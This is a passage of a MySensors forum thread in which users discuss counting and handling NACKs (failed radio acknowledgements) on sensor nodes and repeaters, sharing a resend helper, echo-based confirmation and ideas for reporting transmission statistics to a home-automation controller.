· Another attribute you can put on a test is the [Ignore(reason)] attribute, Use this to skip certain tests , but the reason for their skip will be displayed inside the GUI.
· You can have a [Setup] and [TearDown] method inside your fixture. The [Setup] runs before each test in the current fixture is run, and the [TearDown] runs after each test. These methods are very useful for when you want all your tests to use the same set of clean initialized data. In there you can initialize global variables, delete or create needed files and so on. This of [Setup] as an implicit contructor for each test, and of [TearDown] as a destructor for it. Methods that are marked by these attributes should not be marked as tests as well!
· You can have a [TestFixtureSetUp ] and [TestFixtureTearDown] methods as well. These methods will be run only once for each test fixture tested. Use them for global initialization and cleanup of resources that can be shared by all tests in that fixture.
· Another excellent attribute we get is the [ExcpectedException] attribute. When a test method is decorated with this attribute and no exception of the type specified in the attribute is thrown inside the test, thw test has failed. This is perfect to check that your components throw exceptions at the right moment, such as bad user input and so on. We’ll use this attribute to add another test to our fixture, which test for the CalcException:
[Test]
[ExpectedException(typeof(CalcException))]
public void TestException()
Assert.IsTrue(true);
As you can see it couldn’t be easier.
The Nunit-Addin
Now that you understand the basics of writing unit tests with Nunit, it’s time for me to introduce one of the coolest gadgets related to this subject – the Nunit Addin.
This add-in allows you to ,instead of re-opening the Nunit-Gui every time you need to make sure your tests pass, to just right click on the project or class you wish to test and hit “Run Test(s)”. You’ll get all the information inside VS>NET’s output window.
This add-in allows more than just this functionality, however. It allows you to test a single method from inside the code editor. Just click anywhere inside the code of that method and hit “Run test”.
Another very powerful feature allows you to do what is called “Ad-Hoc testing”. You can create any method, and not even put a [Test] attribute on it. Than, inside that method right click and hit “Test with”-“Debugger” and you immediately step into that method without needed to create a separate project that calls this method. Indeed, very powerful. You can also debug using different versions of the .Net framework or even Mono. This add-in is a must have for quick incremental development.
A word before we finish
The technique I’ve shown here means very little if not pursued diligently. Remember – the first thing you ever do is write the test, not the code. If you keep this up you’ll eventually end up with a system that is fully testable and with fewer bugs. You’ll also find that you think about your component’s design more responsibly, because you’re looking at them from a different perspective. Once you get the “Zen” of it, you’ll start to even have more fun doing it. You’ll also gain confidence in changing your code. You’ll get instant feedback if something broke and you can squash bugs at their inception point.
Another thing that needs to be known– Nunit is the unit testing framework for .Net, but like Nunit there are many others, for practically any semi-popular programming language out there. If you program in C++ for example, take a look at CPPUnit. There’s also a JUnit out there. In fact, Nunit is a port from JUnit into .Net. There are also commercial frameworks and addins that try to provide added functionality through add-ins for .Net unit testing: Some of those include HarnessIt,csUnit and X-Unity.
Most of the non-.Net frameworks all support the same kind of logical notions of test case, fixture and suite, but each one might provide different means of expressing them. Attributes are unique to .Net but in other OO laguages you might have to derive a class from TestFixture to declare it as a fixture and so on. You can find the complete list of frameworks over at (look for the “downloads” link).
Advanced issues
This article is just a first in this series. In the next articles I’ll talk more about real world problems facing a developer who wants to test real-world applications. Some of these issues include:
· Testing abstract classes?
· Testing complex object models and dependencies
· Testing database related features
· Mock objects and their use
· Testing GUI interactions | http://weblogs.asp.net/rosherove/articles/28511.aspx | crawl-002 | refinedweb | 2,613 | 71.65 |
30 April 2009 23:15 [Source: ICIS news]
NEW YORK (ICIS news)--Swiss pharmaceutical major Roche is ready to ramp up production of Tamiflu, a company official said on Thursday, as pharmaceutical chemical companies respond to the swine flu outbreak.
Chemical manufacturers associated with Tamiflu, one of only two anti-virals known to be effective against the current flu, could see a demand windfall if nations around the world move to deepen stockpiles of the drugs.
The World Health Organization (WHO) on Wednesday raised its assessment of the outbreak to phase 5, indicating widespread human infection and one level short of declaring a pandemic. As of Thursday, 11 countries had officially reported 257 cases of swine flu – or influenza A (H1N1) – infection, including eight deaths, according to the WHO.
Although many national stockpiles of Tamiflu (oseltamivir) were established after the 2003 avian flu pandemic, fears are mounting that the quantities now available of Tamiflu and another antiviral, GlaxoSmithKline’s Relenza, will not be sufficient.
David Reddy, Roche’s global pandemic preparedness leader, sought to relieve worries.
“Roche’s 3m treatment courses donated to the WHO in 2006 are ready on 24-hour standby to be deployed to areas of need as determined by the WHO,” he said. “We will be working through the night to do all we can to respond in a rapid, timely and responsible manner for patients in need,” he said.
Roche donated 5m treatment courses of Tamiflu in 2006 - a 2m treatment course “regional stockpile” and a 3m treatment course “rapid response” stockpile. The regional stockpiles are held by the WHO at locations around the world.
Roche said that it had fulfilled government orders for a total of 220m Tamiflu treatments.
Roche also said that it had been in contact with WHO since the UN agency’s pandemic alert was elevated.
If the outbreak spreads widely, existing quantities may not be sufficient.
The WHO has previously recommended that governments prepare for pandemics by stockpiling enough treatments for half the population. Most countries are nowhere near that level, although some EU members come close.
According to the Wall Street Journal, ?xml:namespace>
India, with a population over 1bn, has a stockpile of just 1m treatments, according to Dow Jones International News. East Asian nations are reportedly better prepared, having been devastated by the avian flu. Many African countries have none.
However, time may be on the side of public health. On Wednesday, a team of researchers at Northwestern University released a computer simulation of the current outbreak that projected a worst-case scenario of only 1,700 cases in the US in four weeks, by which point production could be well under way.
Roche has the capacity to produce 70m additional treatments over six months, a fine chemicals consultant said.
Roche could call on the global network of over 17 fine chemical contractors that the drug company established after the 2003 avian flu pandemic to meet demand for stockpiling Tamiflu. Among the members of this network are Groupe Novasep, Clariant, PHT International, Albemarle and AMPAC Fine Chemicals.
Hyderabad, India-based Hetero Drugs has also been producing a generic version authorised by Roche, which has also authorised Chinese producers Shanghai Pharmaceutical Group and HEC Group to provide pandemic supplies in
Indian drugmakers Cipla and Ranbaxy have been producing generic versions for sale into markets where Tamiflu does not have patent protection. Cipla could produce 1.5m treatments within 4-6 weeks, according to a company official quoted | http://www.icis.com/Articles/2009/04/30/9212707/swiss-tamiflu-maker-gears-up-for-swine-flu-pandemic.html | CC-MAIN-2013-48 | refinedweb | 579 | 50.26 |
I'm on Orcon@Home Unlimited, and I was wondering how I could get a LQD report on my line? Would I have to call Orcon and ask for one? If someone that works at Orcon or anyone could advise how that would be great.
Thanks
Home ADSL: School:
FireEngine: So they are produced manually and we aren't going to open a floodgate of just producing them for the sake of it so the real question is....what makes you think you need one? What are we trying to fix here?
Home ADSL: School:
solaybro: I tired to get one from Vodafone and they wouldn't do one either. I was really interested in seeing the results especially after waiting 2 weeks for a reply and they told me they wont do it.
#include <std_disclaimer>
Any comments made are personal opinion and do not reflect directly on the position my current or past employers may have.
---------------------------------------------------------------
Nebukadnessar | https://www.geekzone.co.nz/forums.asp?forumid=82&topicid=147166 | CC-MAIN-2020-16 | refinedweb | 158 | 71.14 |
Hide-by-Signature Functions in Reference Types
In standard C++, a function in a base class will be hidden by a function with the same name in a derived class, even if the derived class function does not have the same number or type of parameters. This is referred to as hide-by-name semantics. In reference types, a function in a base class can only be hidden by a function in a derived type if the name and parameter list are the same. This is called hide-by-signature semantics.
A class is considered a hide-by-signature class when all its functions are marked in the metadata as hidebysig. By default, all classes created under /clr have hidebysig functions. However, a class compiled with /clr:oldSyntax does not have hidebysig functions, they are hide by name functions. When a class has hidebysig functions, the compiler does not hide functions by name in any direct base classes. However, once the compiler encounters a hide-by-name class in an inheritance chain, it resumes hide by name behavior.
Using hide-by-signature semantics, when a function is called on an object, the compiler identifies the most derived class containing a function that could satisfy the function call. If there is only one function in the class that could satisfy the call, the compiler calls that function. If there is more than one function in the class that could satisfy the call, the compiler uses overload resolution rules to determine which function to call. For more information on overload rules, see Function Overloading.
A function in a base class may even have a signature that makes it a slightly better match than a function in a derived class, for a given function call. However, if the function was explicitly called on an object of the derived class, the function in the derived class will be called.
Because the return value is not considered part of a function's signature, a base class function will be hidden if it has the same name and takes the same number and type of arguments as a derived class function, but only differs in the type of the return value.
The following sample shows that a function in a base class is not hidden by a function in a derived class.
// hide_by_signature_1.cpp // compile with: /clr using namespace System; ref struct Base { void Test() { Console::WriteLine("Base::Test"); } }; ref struct Derived : public Base { void Test(int i) { Console::WriteLine("Derived::Test"); } }; int main() { Derived ^ t = gcnew Derived; // Test() in the base class will not be hidden t->Test(); }
Output
Base::Test
The following sample shows that the Visual C++ compiler will call a function in the most derived class, even if a conversion is required to match one or more of the parameters, and not call a function in a base class that is a better match for the function call.
// hide_by_signature_2.cpp // compile with: /clr using namespace System; ref struct Base { void Test2(Single d) { Console::WriteLine("Base::Test2"); } }; ref struct Derived : public Base { void Test2(Double f) { Console::WriteLine("Derived::Test2"); } }; int main() { Derived ^ t = gcnew Derived; // Base::Test2 is better match, but the compiler // will call a function in derived class if possible t->Test2(3.14f); }
Output
Derived::Test2
The following sample shows that it is still possible to hide a function if the base class has the same signature as the derived class.
// hide_by_signature_3.cpp // compile with: /clr using namespace System; ref struct Base { int Test4() { Console::WriteLine("Base::Test4"); return 9; } }; ref struct Derived : public Base { char Test4() { Console::WriteLine("Derived::Test4"); return 'a'; } }; int main() { Derived ^ t = gcnew Derived; // Base::Test4 is hidden int i = t->Test4(); Console::WriteLine(i); }
Output
Derived::Test4 97
The following sample defines a component compiled with /clr:oldSyntax. Classes defined using Managed Extensions for C++ have hide-by-name member functions.
The following sample consumes the component built in the previous sample. Notice how hide-by-signature functionality is not applied to base classes of types compiled with /clr:oldSyntax.
// hide_by_signature_5.cpp // compile with: /clr:oldSyntax /LD // compile with: /clr using namespace System; #using "hide_by_signature_4.dll" ref struct Derived : public Base1 { void Test(int i, int j) { Console::WriteLine("Derived::Test"); } }; int main() { Derived ^ t = gcnew Derived; t->Test(8, 8); // OK t->Test(8); // OK t->Test(); // C2661 } | https://msdn.microsoft.com/en-US/library/ms177192(v=vs.80).aspx | CC-MAIN-2015-27 | refinedweb | 727 | 54.26 |
You can add tasks to the existing Rakefile which is in the project's root folder.
If you have have a set of tasks that you use across Rails projects, you can put them a file named Rakefile or a file with a .rake extension and add the file to the Libs > tasks folder in your project.
Put the file in the Libs > tasks folder so the file is automatically available to Rake.
To make a custom task appear in the Run Rake Task pop-up menu, the task must have a description (see the example below). The assumption is that non-documented targets are implementation targets and the documented ones are the ones you want to expose.
To make newly created custom tasks appear in the menu, right-click the project node and choose Run Rake Task > Refresh List.
To test this out, add the following task to either the Rakefile or to a .rake file in lib/tasks in a Rails project. Right-click the Projects node and choose Run Rake Task > Refresh List. Then choose Run Rake Task > db > schema_version. (Note: this task was taken from the Depot sample application).
namespace :db do
desc "Prints the migration version"
task :schema_version => :environment do
puts ActiveRecord::Base.connection.select_value('select version from schema_info')
end
end
If you have ideas of what to put in the generated Rakefile, you can add them to bug 117668. | http://wiki.netbeans.org/FaqHowToAddCustomTasksToRubyProjects?intcmp=925655 | CC-MAIN-2013-48 | refinedweb | 235 | 72.05 |
Every week.
Never.
Only when stuff goes wrong!
What are you talking about?
Once a month.
At Least Daily
In practice do you consider a unplanned/unexpected server reboot a security incident?
I know that in theory it does (security incident = unexpected event) but I want to know what does everyone PRACTICE?'.
Thanks
Hey Hey,
I don't, personally, think that a reboot is enough to indicate a security incident. The concern may exist, but if I trust the safeguards in place, I'd first lean towards hardware issues... this comes in to play expecially with very new (relatively ununsed and therefore untested... may have conflicts with other parts of the server) and older software that may be on it's way out.
As far as handling, bring it back up (offline if you're suspicious) but check on the Event Log or /var/log/messages or whatever depending on the operating sytem... See if there's anything in there to explain the reboot. Also check if anyone was working around the error... I've seen lots of cases where people have tripped over a power bar or knocked a plug out and just put it back in real fast and snuck away because they don't want to accept blame.
As far as procedures.... that company policy should already be in place.... A call list is the best way... As for the security office.... Physical security should already be accounted for.. Any server rooms should be alarmed so that security is notified if the reboot is caused physically while no one is around. As far as proceding with or without security.... that again depends, if you have an outside party doing physical building security, do you really want them around your equipment? Are you authorized to access the room on your own (as the sys admin)?. The biggest thing for unexplained lockups/reboots/etc is to have a call list in place... Security (should it be reported to them) should know to contact the on-call technical support (if there's currently one in the building)... otherwise a list of technicians/administrators should be created and an order in which to contact them if there is a problem.
This is what I see around the office (for the most part) and what I've learned in class anyways... Some of the more experienced people will probably have a better answer.
Peace,
HT
IT Blog: .:Computer Defense:.
PnCHd (Pronounced Pinched): Acronym - Point 'n Click Hacked. As in: "That website was pinched" or "The skiddie pinched my computer because I forgot to patch"..
Oliver's Law:
Experience is something you don't get until just after you need it.
It is an (IT) incident for sure, but not necessarily security incident. As SirDice said, it could be just plain old hardware failure. Or, an OS/application problem.
Generally speaking, incident is any event that is not part of the standard operation of a service and that causes an interruption (or reduction) in the service quality. Standard operation is defined within the Service Level Agreement (SLA) to users.
Some companies implement incident management for handling incidents. Users would call a help desk/service desk "agent" who record the incident. The agent is then the 1st level support, and has a checklist procedure and access to some monitoring tools. If s/he can't determine the root cause, s/he can escalate the incident (and turn it into a problem) to the appropriate 2nd level support, like the system administrator. When the problem has been solved, the agent will notify the user and close the incident.
Hi. I voted no. Mainly because after an unplanned reboot, a security problem does not first come to mind. I will usually think hardware problem and chase that.
But maybe I should change my thinking. In my neck of the woods, with the NOS's we use, server reboots don't happen too often.
MCNGP Thug # 39
:: The MCNGP :: We are building a better world for all of I.T.
--
Try BSDLive - Business card CD version.
I am with SirDice on this one.
"security" includes the integrity of your data and applications. Re-booting in mid-flight could corrupt both? that potential would also have to be addressed as part of your remedial preoced yes also. Unexpected reboot can have bad consequence (Downtime if your server is a public one like eCommerce) and it should be thread as critical.
-Simon \"SDK\"
Originally posted here by ric-o'.
If you want to impress your boss, try and implement ITIL.
Now I've got a question in return (I already know the answer ) :
Do you consider backups to be part of your security?
I think IT security is a component of the total information assurance umbrella not the other way around.
An inconsistant database due to random reboot can but does not have to be a direct security
incident per se.
A single random reboot or shutdown is cause for alarm and investigation but not a total DEFCON 5 freakout.
Having an implemented incident response plan is always a great idea. Regardless of severity, it's a good idea to report up the chain of command any incident to ensure proper communication and documentation.
A new security triad, CPP, redefines the three main areas of security: Cyber (computer, network and information security), Physical (the wires, silicon, glass and structures) and People (employees, consultants, suppliers, partners and anyone in contact with your company).
\"You got a mouth like an outboard motor..all the time putt putt putt\" - Foghorn Leghorn
Forum Rules | http://www.antionline.com/showthread.php?264241-LimeWire-security-flaw-found-fixed&goto=nextoldest | CC-MAIN-2015-06 | refinedweb | 931 | 65.73 |
cloud-init is used with windows too. See the documentation for
bootstrapping Windows stacks.
EurekaLog exposes several event handlers like OnExceptionNotify.
You can implement these in your code. For example: procedure
EurekaLogExceptionNotify(
EurekaExceptionRecord: TEurekaExceptionRecord; var Handled: Boolean);
Here you can see a TEurekaExceptionRecord which is defined in
ExceptionLog.pas. But you maybe just own the non-source version which works
just fine.
The record has a EurekaExceptionRecord.CallStack list. This proprietary
list can be converted to TStringsusing the CallStackToStrings method which
is also defined in the ExceptionLog unit.
Here is an example where I write the CallStack into a StringList.
CallStackList := TStringList.Create;
try
CallStackToStrings(EurekaExceptionRecord.CallStack, CallStackList);
LogMessage := 'An unhandled exception occured. He
Throw an exception and catch it immediately. I'm not familiar enough with C
but in java this would look like this:
try {
throw new RuntimeException("bla bla");
} catch (Exception ex) {
ex.printStackTrace();
}
This is not the full code, but it should help you.
When you work with multiple workbooks keep track of them. For example start
with:
Dim CurrWB As Workbook
Set CurrWB = ActiveWorkbook
Then in the cycle:
Dim WB As Workbook
For Each StrFile In var
Set WB = Workbooks.Open(loc & StrFile)
...
WB.Close
Next StrFile
Inside the cycle you can find the area to copy doing something like:
R1 = 1
Do While WB.Sheets("Sheet name").Cells(R, 2) <> "Starting text"
R1 = R1 + 1
Loop
R2 = R1 + 1
Do While WB.Sheets("Sheet name").Cells(R2, 2) <> "Ending text"
R = R + 1
Loop
For R = R1 to R2
CurrWB.Sheets("Report").Cells(RReport, 3) = WB.Sheets("Report").Cells(R,
3)
RReport = RReport + 1
Next R
There's no standard for the structure of a reply email. It's not usually
done using multipart email, it just uses human-readable text, often with
> prefixes to denote quoted text. This allows replies to be interspersed
inline with the quoted material.
The only standard features of replies are a couple of headers:
In-Reply-To: <ID>
and
References: <ID1>, <ID2>, <ID3>, ...
In-Reply-To contains the message ID of the message that was replied to.
References is a growing list of message IDs -- when you reply, you take the
original message's reference list and append the ID of the message being
replied to at the end.
See RFC 5322 for more details about these headers.
Incorrect.
There's one kernel address space, and no kernel processes.
There are kernel threads, and there are user space threads that enter the
kernel. These run in the kernel address space.
Each of these has a separate stack, within the kernel address space.
Look at the MODULE, ACTION and CLIENT_INFO columns of V$SESSION.
Then, in the package(s) and/or trigger(s) you suspect are performing the
update, call DBMS_APPLICATION_INFO.SET_MODULE and
DBMS_APPLICATION_INFO.SET_ACTION:
BEGIN
DBMS_APPLICATION_INFO.SET_MODULE(trigger_name, 'trigger start');
-- some code...
DBMS_APPLICATION_INFO.SET_ACTION('updating employee');
-- code which updates the employee table
DBMS_APPLICATION_INFO.SET_ACTION('doing something else');
-- more code...
DBMS_APPLICATION_INFO.SET_MODULE(NULL, NULL);
END;
See also the example provided in the usage notes.
To correct a fluorescence signal bleaching over time, consider using the
bleach corrector plugin for ImageJ.
When thresholding a stack in ImageJ you can calculate the threshold
separately for each slice:
Image > Adjust > Threshold...
leave Stack histogram unchecked to get a preview for the threshold
calculated based on the current slice
click on Apply
in the dialog, choose Calculate threshold for each image to apply the
chosen thresholding method to each stack slice separately.
In order to get the macro source code for this procedure, start the ImageJ
macro recorder via Plugins > Macros > Record... before starting.
The stacks are exactly the same. One can write a program mixed assembly / C
and they use the same stack.
The C compiler uses some conventions on how to use the stack : a
well-formed stack frame is filled in at each function entry ; and
cleaned-up at function leaving. There are compiler directives specific for
altering the stack management. For example : gcc stack checking
Some references on the web : google : c stack frame
In Assembly, the stack has to be managed entirely by the programmer. It is
a good practise to have rules on how to manage the stack (and mimicking C
rules for example)
The stack management instructions are also quite processor dependant
(instructions like push and pop on x86, or stmia / ldmfd on ARM. Similarly,
some processors have dedicated registers for stack poin
NSInteger index = 0;
for (UIViewController *view in self.navigationController.viewControllers) {
if([view.nibName isEqualToString:@"YourViewController"])//put any `XIB
name` where u want to navigate
break;
index = index + 1;
}
//[[self navigationController]
pushViewController:[[self.navigationController viewControllers]
objectAtIndex:index] animated:YES];
[[self navigationController]
popToViewController:[[self.navigationController viewControllers]
objectAtIndex:index] animated:YES];
Depends on the context, but besides the algorithmic structure, stack
usually means the technology your platform is built upon.
Example:
Stack on networking could mean: TCP/IP, SSH, Bluetooth or the different
technologies providing you connectivity.
Stack on OS means the OS itself and the libraries available for your use.
Stack on Programming languages might be the Java EE stack, which means Java
Enterprise APIs will be leveraging your coding.
Hope it made sense. :)
"Stack hog" is an informal name used to describe functions that use
significant amounts of automatic storage (AKA "the stack"). What exactly
counts as "hogging" varies by the execution environment: in general,
kernel-level functions have tighter limits on the stack space - just a few
kilobytes, so a function considered a "stack hog" in kernel mode may become
a "good citizen" in user mode.
A common reason for a function to become a stack hog is allocating buffers
or other arrays in the automatic memory. This is more convenient, because
you do not need to remember to free the memory and check the results of the
allocation. You could also save some CPU cycles on the allocation itself.
The downside is a possibility of overflowing the stack, wich results in
panic for kernel-level programs. Tha
There is, for instance, LinkedList which implements Deque, which has
methods to be used as either a Stack or Queue. There's even a Stack class,
but it doesn't belong to the Collections Framework.
In Visual C++ the default stack size is managed by the linker option /STACK
(doc). By default it is 1 MB.
Note that each new thread will have its own stack, and you can specify the
initial size with parameter dwStackSize in function CreateThread. If it is
0 it will default to the one used in the linker command.
About your other questions, there is no way to query the current/maximum
stack size. To avoid problems it is better to use the heap for any
significant memory allocation.
The easiest and the fastest way to do this, if you're (or wish you to be)
familiar with data.table package is this way (not tested):
require(data.table)
in_pth <- "path_to_csv_files" # directory where CSV files are located,
not the files.
files <- list.files(in_pth, full.names=TRUE, recursive=FALSE,
pattern="\.csv$")
out <- rbindlist(lapply(files, fread))
list.files parameters:
full.names = TRUE will return the full path to your file. Suppose your
in_pth <- "c:\my_csv_folder" and inside this you've two files: 01.csv
and 02.csv. Then, full.names=TRUE will return c:\my_csv_folder\01.csv and
c:\my_csv_folder\02.csv (full path).
recursive = FALSE will not search inside directories within your in_pth
folder. Assume you've two more csv files in
c:\my_csv_folder\another_folder.
Looks Intel x86 at first sight. 'Something' usually be the total length of
all local (stack allocated) variables if this appears in the beginning of
an assembly subroutine. Since the stack grows downwards ie towards lower
addresses, this reserves space for them.
Are you sure the second line is exactly what you wrote? esp is already
pointing to free area so before your routine calls itself recursively or
calls another function the parameters can be pushed on the stack below your
locals. I don't see the point of loading something to esp right after it
was adjusted to accommodate the local vars unless it is used to allow the
(next) callee to access the caller's stack frame, like in Pascal when you
have nested functions.
I'm not sure I fully understand the issue, but here's some advice that I
hope is useful:
A UINavigationController is especially well suited for a stack of vcs,
especially, it seems to me, in the case you present.
The main vc can check the user's logged in state and either present the
login vc or not. It can begin by assuming the user has more than one game
to choose from and build the vc stack as follows:
- (void)viewDidAppear:(BOOL)animated {
// notice I moved the logical or to make the BOOL more meaningful
BOOL isUserLoggedIn = [[NSUserDefaults standardUserDefaults]
boolForKey:@"userLoggedIn"] || (!setAuthenticationKey ||
[setAuthenticationKey isKindOfClass:[NSNull class]]);
if (!isUserLoggedIn) {
SelectGameVC *selectGameVC = // not sure how you build this, eith
Linux 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:39 EDT 2010 x86_64
... followed by 4 bytes for pointer "p" ...
You are on a 64 bit architecture, so a pointer occupies 64 bit = 8 bytes:
#include <stdio.h>
int main() {
int a = 0x12345678;
int *p = &a;
printf("%zu
", sizeof(p));
printf("%zu
", sizeof(a));
return 0;
}
$ gcc -std=c99 -Wall -pedantic -o sample sample.c
$ ./sample
8
4
Detailed stack analysis:
When entering func(), after executing the first two instructions, the stack
looks like this (assumed that each rectangle is 4 bytes of memory):
0x0000000000400528 <func()+0>: push %rbp
0x0000000000400529 <func()+1>: mov %rsp,%rbp
+..........+
| RET ADDR | (from CALL)
+----------+
|RBP (high)|
+..........|
|RBP (low) | <== RSP,
That will work provided the arithmetic is done correctly. My usual bug is
being off-by-one on such things.
You might also have a look at the enter and leave instructions to do
something similar.
Yes, it's possible, you just need to remove and then re-add all of the
items in the stack.
public static void PushUnique<T>(this Stack<T> stack, T item
, IEqualityComparer<T> comparer = null)
{
comparer = comparer ?? EqualityComparer<T>.Default;
var otherStack = new Stack<T>();
while (stack.Any())
{
var next = stack.Pop();
if (!comparer.Equals(next, item))
otherStack.Push(next);
}
foreach (var next in otherStack)
stack.Push(next);
stack.Push(item);
}
Try this:
#middle{
z-index:10;
border-radius:10px;
border:15px solid #232323;
background: #232323;
width:400px;
height:200px;
text-align:center;
top:180px;
left: 50%;
margin-left: -215px; /* This is half the total width (width + border +
padding) */
position:absolute;
}
Yes threads have their own stacks and their own kernel stacks (e.g. linux).
When a thread makes a system call, you trap into kernel mode (from user
mode), you pass the arguments to the kernel, the arguments are checked, the
kernel does w/e it needs to do (in the kernel stack), returns the final
value back to the thread and you go back to user mode.
You can create a new thread with the stacksize you want...
var tcs = new TaskCompletionSource<BigInteger>();
int stackSize = 1024*1024*1024;
new Thread(() =>
{
tcs.SetResult(Factorial(10000));
},stackSize)
.Start();
var result = tcs.Task.Result;
But as mentioned in comments, an iterative way for this would be better..
None of the built in positions quite do this, and geom_dotplot isn't quite
right either because it only works in one dimension. I've cobbled together
a new position which does the right sort of thing, but requires manual
tweaking to get everything right.
library("proto")
PositionNudge <- proto(ggplot2:::Position, {
objname <- "nudge"
adjust <- function(., data) {
trans_x <- function(x) {
lx <- length(x)
if (lx > 1) {
x + .$width*(seq_len(lx) - ((lx+1)/2))
} else {
x
}
}
trans_y <- function(y) {
ly <- length(y)
if (ly > 1) {
y + .$height*(seq_len(ly) - ((ly+1)/2))
} else {
y
}
}
ddply(data, .(group), transform_position, trans_x=trans_x,
trans_y=trans_y)
}
})
char time_buf[32] = {0};
/* format time as `14 Jul 20:00:08`, and exactly 16 bytes */
strftime(time_buf, sizeof(time_buf), "%d %b %H:%M:%S",
localtime(&now));
nb_bytes = snprintf(msg, sizeof(msg), "%s", time_buf);
So effectively time_buf and msg contain the same data. snprintf returns the
number of characters that would have been successfully written to msg not
counting the null character.
vsnprintf(msg + nb_bytes, MAX_LOG_MSG_SZ, fmt, ap);
You are trying to write from the address given by msg+nb_bytes. You had 16
characters in msg. But you claim that you have MAX_LOG_MSG_SZ which is 32
characters. You are trying to write to end of the string. Perhaps fmt
contains more than 15 characters.
vsnprintf(msg + nb_bytes, MAX_LOG_MSG_SZ - nb_bytes, fmt, ap);
This time you properly sub
Your push should be
(*top)++;
stack[*top] = value;
That is first increment to the next empty position and then insert. The top
variable always points to the top element. Therefore to push, first
increment then assign. To pop, first extract the value at top and then
decrement.
Note: the above line can be clubbed to stack[++(*top)] = value
In the current code, at the first push, your code with stack[*top++] =
item, with the post increment attempts to assign the value to the current
value of *top which is -1 and then increment, which is wrong.
With respect to this modification of push routine the pop routine is okay.
There is no way to create objects on the stack in Java. Java also has
automatic garbage collection, so you don't have any way of deleting
objects. You just let all references to them go out of scope and eventually
the garbage collector deals with them. | http://www.w3hello.com/questions/Getting-information-from-one-CloudFormation-stack-to-use-in-another | CC-MAIN-2018-17 | refinedweb | 2,254 | 56.55 |
Handling NACKs
Re: Handling NACKs in the gateway
Is it possible to catch an NACK in the code? Say to make an if (NACK) { Do stuff } ??
the send() function returns true if message reached the first stop on its way to destination.
@electrik - ok, so something like:
void loop() { NACK = send(message to send); if (NACK == 0) { Do stuff } }
@electrik hi. The is fine for a node where the code is part of the node sketch. However, because the gateway code is built into the libraries, it makes it difficult to implement in the gateway. As on the other thread one answer may be to change the controller code to request a confirmation from the gateway of delivery. In my case, I am using generic mqtt thing in openhab so not sure how to to be honest but will have a think.
@4994james - thanks James, but thats why I created a new thread, im interested in the node part. To create some sort of radio tester where you can send a message each second, get NACK or ACK and then output a signal/led when everything is fine to get some sort of coverage map of my house.
@sundberg84 sounds similar to ?
@sundberg84 yes exactly. I can look for a detailed example later
This what I borrowed and extended once
boolean resend(MyMessage &msg, int repeats) // Resend messages if not received by gateway { int repeat = 0; int repeatDelay = 0; boolean ack = false; uint8_t i; while (ack == false && repeat < repeats) { wait(repeatDelay); if (send(msg)) { ack = true; } else { ack = false; if (repeatDelay < 500) repeatDelay += 100; } repeat++; } return (ack); }
you can call it like the normal send function
resend(msg, 3);
- karlheinz2000 last edited by
I count in every node, if send() returns false and send the number to controller to get an idea about rf quality.
I do not retry, because Mysensors already retries, right?
I use NFR24 and RFM69. Behavior is sometimes strange. No NACKs for weeks and then a really high number of NACKs for a few days. Setup not changed. I have no idea why... Same for indoor and outdoor sensors.
@karlheinz2000 - interesting, like a incrementing pulsecounter? Or what kind of sensor do you present to do this? Im thinking for a batterynode.
- karlheinz2000 last edited by
@sundberg84 - yes, it's just a 16bit incrementing counter. It counts all NACKs as long as the node is not reset.
Before node goes to sleep, node sends the total number of NACKs. I'm using V_ID for that. Controller (FHEM) calculates then delta NACKs between two sends -> "lost messages". The lost messages are counted day by day separately. So I can easily see when during the day the lost messages rise and can also compare values day by day.
I'm not using presentation that much. For most nodes I configure the controller manually. So I'm more flexible in which variables I can use in which context.
- BearWithBeard last edited by BearWithBeard
Yeah, using the return value of
send()is a neat and simple way to get a rough estimate of how reliable a connection is. In my weather station prototype, I transmit up to 8 different sensor values every 5 minutes (if they exceeded a specified threshold compared to the previous measurement) and increase a
tx_errorsvariable with each NACK and send that value at the end of each transmission period.
tx_errorsgets reset to 0 if its
send()function returned
true. If it sends a 0, it means that there were no transmission errors. This way it doubles as a heartbeat.
@electrik said in Handling NACKs:
boolean resend(MyMessage &msg, int repeats) // Resend messages if not received by gateway { [...] if (send(msg)) [...] }
I guess that you know that, but just to clarify: This code does not tell you that the gateway (destination node) received the message, unless the sending node is directly connected to it. Hardware ACK - via the return value of
send()- only tells you that the first node (the sender's parent) on the way to the destination received the message.
If you want to ensure that the gateway / destination received the message, you have to request an echo (
send(msg, true)) and listen for it in
receive(). Something like that:
void receive(const MyMessage &message) { if (message.isEcho()) { // You received the echo } }
Note: If you are using MySensors version lower than the current 2.3.2, then
isEcho()is called
isAck().
@BearWithBeard @karlheinz2000 - this is gold, thank you. I going to be a bit more annoying here
What about doing this to a repeater?
I have 3 main repeaters in my house. Do you know if it would be possible to catch the NACK / OK coming from all repeated messages? I guess we are talking changing in the core code?
WOuld be awsome, to collect hourly OK and NACk and send to the controller for these three repeaters. It would indicate issues with both those three main nodes and also the network as a whole.
- BearWithBeard last edited by
@sundberg84 Statistics are awesome, I like your thought!
But I'm afraid that you are right: There seems to be no easy way to get TX success indicators outside of the sending node. Atleast not without changes to the library.
You can either ...
- verify that the parent of the sender received the message (hardware ACK), or
- verify that the destination (generally the gateway) received the message (software ACK / echo),
... but not if any of the parents successfully passed the message on.
I guess, if you really wanted to, you could use direct node-to-node communication: On your sensor node, send the message to the nearest repeater, handle the message in
receive()on the repeater and send it manually to the next repeater, until you reach the gateway. Then you should have full control over monitoring hardware ACK, at the cost of having a completely static network. I don't think that's desirable though...
Maybe the indication handler could be used to count transmission failures?
I'm counting the send() fails and send that at intervals to the gateway as a child sensor.
This won't work off course for repeaters so I guess @mfalkvidd's idea would do the trick.
Or alternatively send dummy data, just to check the connection.
@karlheinz2000 said in Handling NACKs:
I use NFR24 and RFM69. Behavior is sometimes strange. No NACKs for weeks and then a really high number of NACKs for a few days. Setup not changed. I have no idea why... Same for indoor and outdoor sensors.
I've had similar effects and could relate this back to the gateway. I'm using an MQTT gateway and if that has Wifi connection issues, it is trying to reconnect to the network in a loop. During these retries it can't handle the NRF communication, if there are more messages than fit in the buffer.
After solving these Wifi issues (updated the ESP32 core) and using the latest Mysensors release, things work much better.
@mfalkvidd - do you have a pointer to where I can start, bear in mind Im a very bad coder so I need somewhere to start following the logic.
@sundberg84 seems like it isn't very well documented, but has some information.
increasing a counter for every INDICATION_ERR_TX and another counter for every INDICATION_TX could be sufficient to get a good ratio of how many successful and failed transmissions there are.
Edit: might be better to start from
Something like this should work. Not sure if a power meter is the best way to present to controller, fee free to use something better.
